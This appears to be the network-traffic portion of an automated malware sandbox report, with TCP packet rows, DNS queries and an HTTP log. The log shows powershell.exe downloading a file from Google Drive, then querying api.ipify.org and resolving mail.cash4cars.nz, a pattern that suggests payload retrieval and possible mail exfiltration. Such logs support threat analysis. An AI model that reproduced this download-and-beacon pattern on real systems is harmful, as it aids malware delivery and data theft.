                                                      Apr 24, 2024 06:48:55.545191050 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.545249939 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.545258045 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.547377110 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.547480106 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.547489882 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.549545050 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.549638987 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.549643040 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.549673080 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.549724102 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.551731110 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.553786039 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.553913116 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.553924084 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.555938959 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.556010962 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.556020975 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.557900906 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.557969093 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.558003902 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.558013916 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.558068991 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:48:55.559905052 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.562199116 CEST44349731142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:48:55.562269926 CEST49731443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.949733019 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.957699060 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.957741976 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.957748890 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.957777977 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.965504885 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.965549946 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.965557098 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.965599060 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.973573923 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.973632097 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.973639965 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.973676920 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.981581926 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.981637001 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.981643915 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.981679916 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.989631891 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.989707947 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.993494987 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.993546009 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:36.993551970 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:36.993587017 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.001538992 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.001606941 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.001614094 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.001647949 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.009613991 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.009660959 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.009669065 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.009701967 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.017507076 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.017559052 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.017566919 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.017601013 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.025655985 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.025732040 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.025741100 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.025784016 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.033560038 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.033628941 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.033637047 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.033674955 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.041906118 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.041973114 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.042007923 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.042054892 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.049571991 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.049657106 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.049665928 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.049705029 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.057287931 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.057334900 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.057343960 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.057378054 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.064908028 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.064955950 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.064965010 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.065001011 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.072776079 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.072820902 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.072829008 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.072865009 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.079730988 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.079775095 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.079782963 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.079818964 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.087420940 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.087477922 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.090617895 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.090665102 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.090673923 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.090717077 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.097944021 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.098011017 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.098017931 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.098057032 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.105225086 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.105293989 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.105300903 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.105339050 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.109963894 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.110007048 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.110016108 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.110050917 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.114485025 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.114538908 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.114550114 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.114586115 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.119004965 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.119098902 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.119112015 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.119152069 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.123594046 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.123661995 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.123673916 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.123711109 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.127950907 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.128020048 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.128030062 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.128078938 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.132365942 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.132426023 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.132471085 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.132514954 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.132522106 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.132565022 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.136770964 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.136970043 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.136977911 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.137037039 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.141036034 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.141088009 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.141094923 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.141132116 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.145364046 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.145427942 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.145436049 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.145472050 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.149564028 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.149609089 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.151820898 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.151865005 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.151900053 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.151940107 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.156240940 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.156300068 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.156307936 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.156347036 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.160340071 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.160382032 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.160389900 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.160430908 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.163851976 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.163894892 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.163902044 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.163940907 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.167859077 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.167912960 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.167920113 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.167960882 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.171848059 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.171894073 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.171901941 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.171946049 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.175709009 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.175750971 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.175757885 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.175805092 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.179630995 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.179673910 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.179681063 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.179718971 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.183408976 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.183578014 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.183583975 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.183626890 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.187079906 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.187122107 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.187129974 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.187165022 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.187171936 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.187206984 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.190694094 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.190737009 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.190743923 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.190781116 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.194408894 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.194453001 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.194459915 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.194524050 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.197932005 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.197998047 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.199902058 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.199948072 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.199954987 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.199994087 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.203284025 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.203330040 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.203336954 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.203372955 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.206929922 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.206979990 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.206986904 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.207026005 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.210589886 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.210634947 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.210642099 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.210675001 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.214277029 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.214327097 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.214334011 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.214369059 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.217627048 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.217674971 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.217681885 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.217715979 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.220777035 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.220834017 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.220841885 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.220875025 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.224927902 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.225028992 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.225049019 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.225081921 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.227865934 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.227914095 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.227921963 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.227957010 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.231313944 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.231358051 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.231380939 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.231430054 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.231436968 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.231476068 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.234422922 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.234472036 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.234482050 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.234517097 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.237746000 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.237787008 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.237806082 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.237840891 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.241106987 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.241152048 CEST49739443192.168.2.4142.251.2.132
                                                      Apr 24, 2024 06:49:37.242878914 CEST44349739142.251.2.132192.168.2.4
                                                      Apr 24, 2024 06:49:37.242927074 CEST49739443192.168.2.4142.251.2.132
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Apr 24, 2024 06:48:51.899779081 CEST | 50897 | 53 | 192.168.2.4 | 1.1.1.1 |
| Apr 24, 2024 06:48:52.053853035 CEST | 53 | 50897 | 1.1.1.1 | 192.168.2.4 |
| Apr 24, 2024 06:48:52.872275114 CEST | 62863 | 53 | 192.168.2.4 | 1.1.1.1 |
| Apr 24, 2024 06:48:53.026145935 CEST | 53 | 62863 | 1.1.1.1 | 192.168.2.4 |
| Apr 24, 2024 06:49:35.153112888 CEST | 54567 | 53 | 192.168.2.4 | 1.1.1.1 |
| Apr 24, 2024 06:49:35.321082115 CEST | 53 | 54567 | 1.1.1.1 | 192.168.2.4 |
| Apr 24, 2024 06:49:37.827011108 CEST | 60815 | 53 | 192.168.2.4 | 1.1.1.1 |
| Apr 24, 2024 06:49:37.982034922 CEST | 53 | 60815 | 1.1.1.1 | 192.168.2.4 |
| Apr 24, 2024 06:49:40.209075928 CEST | 57845 | 53 | 192.168.2.4 | 1.1.1.1 |
| Apr 24, 2024 06:49:40.498223066 CEST | 53 | 57845 | 1.1.1.1 | 192.168.2.4 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Apr 24, 2024 06:48:51.899779081 CEST | 192.168.2.4 | 1.1.1.1 | 0xf69f | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:48:52.872275114 CEST | 192.168.2.4 | 1.1.1.1 | 0x38e1 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:49:35.153112888 CEST | 192.168.2.4 | 1.1.1.1 | 0x6e8c | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:49:37.827011108 CEST | 192.168.2.4 | 1.1.1.1 | 0xc79d | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:49:40.209075928 CEST | 192.168.2.4 | 1.1.1.1 | 0xac1d | Standard query (0) | mail.cash4cars.nz | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Apr 24, 2024 06:48:52.053853035 CEST | 1.1.1.1 | 192.168.2.4 | 0xf69f | No error (0) | drive.google.com | | 142.251.2.139 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:48:52.053853035 CEST | 1.1.1.1 | 192.168.2.4 | 0xf69f | No error (0) | drive.google.com | | 142.251.2.100 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:48:52.053853035 CEST | 1.1.1.1 | 192.168.2.4 | 0xf69f | No error (0) | drive.google.com | | 142.251.2.101 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:48:52.053853035 CEST | 1.1.1.1 | 192.168.2.4 | 0xf69f | No error (0) | drive.google.com | | 142.251.2.113 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:48:52.053853035 CEST | 1.1.1.1 | 192.168.2.4 | 0xf69f | No error (0) | drive.google.com | | 142.251.2.102 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:48:52.053853035 CEST | 1.1.1.1 | 192.168.2.4 | 0xf69f | No error (0) | drive.google.com | | 142.251.2.138 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:48:53.026145935 CEST | 1.1.1.1 | 192.168.2.4 | 0x38e1 | No error (0) | drive.usercontent.google.com | | 142.251.2.132 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:49:35.321082115 CEST | 1.1.1.1 | 192.168.2.4 | 0x6e8c | No error (0) | drive.usercontent.google.com | | 142.251.2.132 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:49:37.982034922 CEST | 1.1.1.1 | 192.168.2.4 | 0xc79d | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:49:37.982034922 CEST | 1.1.1.1 | 192.168.2.4 | 0xc79d | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:49:37.982034922 CEST | 1.1.1.1 | 192.168.2.4 | 0xc79d | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false |
| Apr 24, 2024 06:49:40.498223066 CEST | 1.1.1.1 | 192.168.2.4 | 0xac1d | No error (0) | mail.cash4cars.nz | | 114.142.162.17 | A (IP address) | IN (0x0001) | false |

                                                      • drive.google.com
                                                      • drive.usercontent.google.com
                                                      • api.ipify.org

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.4 | 49730 | 142.251.2.139 | 443 | 6692 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |

                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-04-24 04:48:52 UTC | 215 | OUT | GET /uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9 HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Connection: Keep-Alive
                                                      2024-04-24 04:48:52 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Wed, 24 Apr 2024 04:48:52 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-UfIrKKRY713Z6Iv8TOf_qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
